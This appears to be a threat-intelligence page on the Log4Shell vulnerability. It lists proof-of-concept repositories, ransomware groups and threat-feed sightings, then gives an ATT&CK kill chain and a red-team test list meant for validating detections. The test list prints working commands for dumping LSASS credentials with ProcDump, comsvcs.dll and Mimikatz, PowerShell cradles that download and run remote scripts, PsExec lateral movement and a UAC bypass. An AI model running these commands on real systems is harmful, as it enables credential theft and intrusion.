YangHyperData/LOGJ4_PocShell_CVE-2021-44228
YangHyperData 0 0 2024-04-02 View
NikitaPark/Log4Shell-PoC-Application
Log4Shell (CVE-2021-44228) PoC Application
NikitaPark 0 0 2024-05-29 View
asd58584388/CVE-2021-44228
CVE-2021-44228 vulnerability study
asd58584388 0 0 2024-07-26 View
OtisSymbos/CVE-2021-44228-Log4Shell-
OtisSymbos 0 0 2024-09-11 View
safeer-accuknox/log4j-shell-poc
Log4J exploit CVE-2021-44228
safeer-accuknox 0 0 2024-09-11 View
AhmedMansour93/-Unveiling-the-Lessons-from-Log4Shell-A-Wake-Up-Call-for-Cybersecurity-
In December 2021, the world of cybersecurity was shaken by the discovery of the Log4Shell vulnerability (CVE-2021-44228)...
AhmedMansour93 0 0 2024-11-10 View
ZacharyZcR/CVE-2021-44228
调试环境
ZacharyZcR 0 0 2025-01-20 View
yadavmukesh/Log4Shell-vulnerability-CVE-2021-44228-
This repository provides an in-depth analysis of the Log4Shell vulnerability (CVE-2021-44228) and implements a machine l...
yadavmukesh 0 0 2025-02-17 View
tpdlshdmlrkfmcla/Log4shell
CVE-2021-44228
tpdlshdmlrkfmcla 0 0 2025-03-12 View
timothyjxhn/DeliberatelyVulnerableWebApp
A Deliberately Vulnerable Web Application built on Struts 2 (CVE-2017-5638) and Log4J (CVE-2021-44228) for testing and d...
timothyjxhn 0 0 2025-03-27 View
khaidtraivch/CVE-2021-44228-Log4Shell-
Kiểm thử xâm nhập
khaidtraivch 0 0 2025-04-14 View
Fauzan-Aldi/Log4j-_Vulnerability
The Web Is Vulnerable to CVE-2021-44228
Fauzan-Aldi 0 0 2025-05-08 View
SerpilRivas/log4shell-homework9
Log4Shell (CVE-2021-44228) exploit demo for SEAS 8405. Includes a vulnerable Spring Boot app, fake LDAP server, Docker s...
SerpilRivas 0 0 2025-05-27 View
x1ongsec/CVE-2021-44228-Log4j-JNDI
CVE-2021-44228 Vulnerability Reproduction Environment CVE-2021-44228 漏洞复现环境
x1ongsec 0 0 2025-06-21 View
fabioeletto/hka-seminar-log4shell
Praktische Demonstration der Log4Shell-Sicherheitslücke (CVE-2021-44228)
fabioeletto 0 0 2025-07-10 View
cuijiung/log4j-CVE-2021-44228
cuijiung 0 0 2025-07-11 View
Sorrence/CVE-2021-44228
A simple Log4j PoC written in Go
Sorrence 0 0 2025-08-04 View
KamalideenAK/Microsoft-Defender-for-Endpoint-Deployment-on-Windows-10-11-device
This repository documents how deployment of Microsoft Defender for Endpoint on a Windows 11 device, including onboarding...
KamalideenAK 0 0 2025-09-27 View
arabindadora/log4shell
Log4Shell (CVE-2021-44228) PoC
arabindadora 0 0 2025-09-29 View
Mintimate/log4j2-bugmaker
Demo of CVE-2021-44228 Log4Shell.
Mintimate 0 0 2025-10-28 View
mgueye3/Log4Shell
This repository contains my work for a cybersecurity assignment where I exploited the real-world Log4Shell (CVE-2021-442...
mgueye3 0 0 2025-11-16 View
PCMKUIT/CVE-2021-44228---Log4Shell-Analysis
Technical deep dive into Apache Log4j2 JNDI injection vulnerability. Features static code analysis, patch comparison, at...
PCMKUIT 0 0 2025-11-18 View
DrHaitham/Log4Shell-CVE-2021-44228
Hands-on lab for exploiting and understanding Log4Shell (CVE-2021-44228) using Docker, Kali Linux, Burp Suite and log4j-...
DrHaitham 0 0 2025-12-05 View
Loliverte/Log4j-Vulnerability
Étude technique et mise en œuvre d'un environnement de test pour la faille Apache Log4j (CVE-2021-44228). Contient un Pr...
Loliverte 0 0 2025-12-14 View
JoseMariaMicoli/Log4Shell-PoC
**Log4Shell PoC is a high-fidelity exploitation environment designed to replicate the CVE-2021-44228 vulnerability.** It...
JoseMariaMicoli 0 0 2026-01-14 View
agylabs/log4shell-remediation
Log4Shell (CVE-2021-44228) security remediation demo - Showcasing Antigravity's ability to identify and fix critical sec...
agylabs 0 0 2026-02-05 View
0xBlackash/CVE-2021-44228
CVE-2021-44228
0xBlackash 0 0 2026-02-26 View
Codepumpking/log4shell-poc
POC for log4shll Vulnerablity (CVE-2021-44228)
Codepumpking 0 0 2026-03-15 View
wmohamed2033/wmohamed2033.github.io
CVE-2021-44228 Log4Shell — Penetration Test Writeup
wmohamed2033 0 0 2026-03-17 View
Saru1718/THM---Solar-exploiting-Log-4j
This room is based on exploiting the notorious Log4j vulnerability ( CVE-2021-44228), also referred to as the Log4Shell....
Saru1718 0 0 2026-03-22 View
Lavanya2085/solar-exploiting-log4j
This repository provides a detailed walkthrough of the *Solar Exploiting Log4j room* on TryHackMe, focusing on exploiti...
Lavanya2085 0 0 2026-03-22 View
Rainyseason-c/log4j2_CVE-2021-44228
Rainyseason-c 0 0 2022-12-30 View
Alan-coder-eng/log4j-cve-2021-44228-
Alan-coder-eng 0 0 2025-07-25 View
dbgee/CVE-2021-44228
Apache Log4j 2 a remote code execution vulnerability via the ldap JNDI parser.
dbgee 0 0 2021-12-10 View
TheArqsz/CVE-2021-44228-PoC
TheArqsz 0 0 2021-12-10 View
gauthamg/log4j2021_vul_test
Test the CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
gauthamg 0 0 2021-12-11 View
LemonCraftRu/JndiRemover
Небольшой мод направленный на устранение уязвимости CVE-2021-44228
LemonCraftRu 0 0 2021-12-11 View
zhangxvx/Log4j-Rec-CVE-2021-44228
Apache Log4j CVE-2021-44228 漏洞复现
zhangxvx 0 0 2021-12-11 View
creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review
log4j2漏洞复现
creamIcec 0 0 2021-12-12 View
Crane-Mocker/log4j-poc
Poc of log4j2 (CVE-2021-44228)
Crane-Mocker 0 0 2021-12-12 View
urholaukkarinen/docker-log4shell
Dockerized Go app for testing the CVE-2021-44228 vulnerability
urholaukkarinen 0 0 2021-12-12 View
lohanichaten/log4j-cve-2021-44228
lohanichaten 0 0 2021-12-12 View
fireflyingup/log4j-poc
CVE-2021-44228 test demo
fireflyingup 0 0 2021-12-12 View
maxant/log4j2-CVE-2021-44228
maxant 0 0 2021-12-13 View
markuman/aws-log4j-mitigations
CVE-2021-44228 log4j mitigation using aws wafv2 with ansible
markuman 0 0 2021-12-13 View
Camphul/log4shell-spring-framework-research
Research into the implications of CVE-2021-44228 in Spring based applications.
Camphul 0 0 2021-12-13 View
racoon-rac/CVE-2021-44228
racoon-rac 0 0 2021-12-10 View
datadavev/test-44228
Simple demo of CVE-2021-44228
datadavev 0 0 2021-12-11 View
lov3r/cve-2021-44228-log4j-exploits
CVE-2021-4428 复现
lov3r 0 0 2021-12-13 View
LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228
LutziGoz 0 0 2021-12-13 View
1hakusai1/log4j-rce-CVE-2021-44228
log4j2 CVE-2021-44228 POC
1hakusai1 0 0 2021-12-13 View
VNYui/CVE-2021-44228
Mass recognition tool for CVE-2021-44228
VNYui 0 0 2021-12-13 View
flxhaas/Scan-CVE-2021-44228
flxhaas 0 0 2021-12-13 View
tobiasoed/log4j-CVE-2021-44228
tobiasoed 0 0 2021-12-13 View
rodfer0x80/log4j2-prosecutor
CVE-2021-44228
rodfer0x80 0 0 2021-12-13 View
yanghaoi/CVE-2021-44228_Log4Shell
Log4Shell A test for CVE-2021-44228
yanghaoi 0 0 2021-12-13 View
ben-smash/l4j-info
Compiling links of value i find regarding CVE-2021-44228
ben-smash 0 0 2021-12-13 View
strawhatasif/log4j-test
Demonstration of CVE-2021-44228 with a possible strategic fix.
strawhatasif 0 0 2021-12-13 View
tica506/Siem-queries-for-CVE-2021-44228
tica506 0 0 2021-12-13 View
cbuschka/log4j2-rce-recap
Little recap of the log4j2 remote code execution (CVE-2021-44228)
cbuschka 0 0 2021-12-14 View
andrii-kovalenko-celonis/log4j-vulnerability-demo
Endpoint to test CVE-2021-44228 – Log4j 2
andrii-kovalenko-celonis 0 0 2021-12-14 View
ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228
CVE-2021-44228
ShaneKingBlog 0 0 2021-12-14 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest MEDIUM
Sightings Few sightings

Ransomware Groups 10

lockbit
CONFIRMED
5 victims
correlation_misp
2026-04-05
lockbit
CONFIRMED
5 victims
ransomware.live
2026-06-25
nightsky
CONFIRMED
2 victims
ransomware.live
2026-06-25
lockbit black
CONFIRMED
correlation_misp
2026-04-05
lockbit green
CONFIRMED
correlation_misp
2026-04-05
lockbit 30
CONFIRMED
correlation_misp
2026-04-05
lockbit 20
CONFIRMED
correlation_misp
2026-04-05
Magic Hound
CORRELATED
correlation_mitre
2026-04-05
Iranian IRGC Data Extortion Operations
CORRELATED
correlation_misp
2026-04-05
Sea Turtle
CORRELATED
correlation_mitre
2026-04-05

Threat Feed

52 events
2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Exploited by lockbit

Ransomware group known to exploit this vulnerability (5 known victims)

2026-06-25
Exploited by nightsky

Ransomware group known to exploit this vulnerability (2 known victims)

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-15
Exploited by nightsky

Ransomware group known to exploit this vulnerability (2 known victims)

2026-04-05
Exploited by lockbit

Ransomware group known to exploit this vulnerability (5 known victims)

2026-04-05
Exploited by lockbit black

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit green

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit 30

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit 20

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Magic Hound

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Iranian IRGC Data Extortion Operations

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Sea Turtle

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit

Ransomware group known to exploit this vulnerability (5 known victims)

2026-04-05
Exploited by lockbit black

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit 30

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Magic Hound

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit 20

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Sea Turtle

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit green

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Iranian IRGC Data Extortion Operations

Ransomware group known to exploit this vulnerability

2021-12-10
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2021-12-09
Exploit Published (3 ExploitDB, 5 Metasploit)

Public exploit code is available for this vulnerability

2021-12-09
PoC Published (424 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Target OS:

Deployed role: Linux · Web Server

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.

Attack Vectors ML

JNDI/Expression Language Injection
100% jndi_injection
Remote Code Execution
100% rce
Deserialization Vulnerabilities
100% deserialization
Code Injection
67% code_injection
Improper Input Validation
58% input_validation

MITRE ATT&CK Techniques (10)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.001 PowerShell Kill Chain execution Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1003.001 LSASS Memory Kill Chain credential-access Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1087.002 Domain Account Kill Chain discovery Linux, macOS, Windows
T1021.002 SMB/Windows Admin Shares Kill Chain lateral-movement Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-586 Object Injection
48%
Medium High

Red Team Playbook

108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1003.001 Create Mini Dump of LSASS.exe using ProcDump Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created...
Command (CMD)
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
T1003.001 Dump LSASS with createdump.exe from .Net v5 Windows PowerShell Privileged
Use createdump executable from .NET to create an LSASS dump. [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
Command (PowerShell)
$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
T1003.001 Dump LSASS.exe Memory through Silent Process Exit Windows CMD Privileged
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to...
Command (CMD)
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
T1003.001 Dump LSASS.exe Memory using NanoDump Windows CMD Privileged
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanondump.dmp file in the temp directory
Command (CMD)
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
T1003.001 Dump LSASS.exe Memory using Out-Minidump.ps1 Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created...
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
T1003.001 Dump LSASS.exe Memory using ProcDump Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is...
Command (CMD)
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
T1003.001 Dump LSASS.exe Memory using Windows Task Manager Windows Manual
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions.
T1003.001 Dump LSASS.exe Memory using comsvcs.dll Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
Command (PowerShell)
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
T1003.001 Dump LSASS.exe Memory using direct system calls and API unhooking Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection....
Command (CMD)
"#{dumpert_exe}"
T1003.001 Dump LSASS.exe using imported Microsoft DLLs Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that...
Command (PowerShell)
#{xordump_exe} -out #{output_file} -x 0x41
T1003.001 Dump LSASS.exe using lolbin rdrleakdiag.exe Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with lolbin rdrleakdiag.exe. Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and $env:TEMP\results_<PID>.hlk.
Command (PowerShell)
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
T1003.001 LSASS read with pypykatz Windows CMD Privileged
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes...
Command (CMD)
"#{venv_path}\Scripts\pypykatz" live lsa 
T1003.001 Offline Credential Theft With Mimikatz Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
Command (CMD)
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
T1003.001 Powershell Mimikatz Windows PowerShell Privileged
Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks...
Command (PowerShell)
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
T1021.002 Copy and Execute File with PsExec Windows CMD Privileged
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
Command (CMD)
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
T1021.002 Execute command writing output to local Admin Share Windows CMD Privileged
Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks.
Command (CMD)
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
T1021.002 Map Admin Share PowerShell Windows PowerShell
Map Admin share utilizing PowerShell
Command (PowerShell)
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
T1021.002 Map admin share Windows CMD
Connecting To Remote Shares
Command (CMD)
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.001 ATHPowerShellCommandLineParameter -Command parameter variations Windows PowerShell
Executes powershell.exe with variations of the -Command parameter
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
T1059.001 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments Windows PowerShell
Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations Windows PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
T1059.001 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments Windows PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 Abuse Nslookup with DNS Records Windows PowerShell
Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts. [reference](https://twitter.com/jstrosch/status/1237382986557001729)
Command (PowerShell)
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
T1059.001 Invoke-AppPathBypass Windows CMD
Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Command (CMD)
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
T1059.001 Mimikatz Windows CMD Privileged
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
Command (CMD)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
T1059.001 Mimikatz - Cradlecraft PsSendKeys Windows PowerShell Privileged
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
Command (PowerShell)
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
T1059.001 NTFS Alternate Data Stream Access Windows PowerShell
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
Command (PowerShell)
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
T1059.001 PowerShell Command Execution Windows CMD
Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
Command (CMD)
powershell.exe -e  #{obfuscated_code}
T1059.001 PowerShell Fileless Script Execution Windows PowerShell
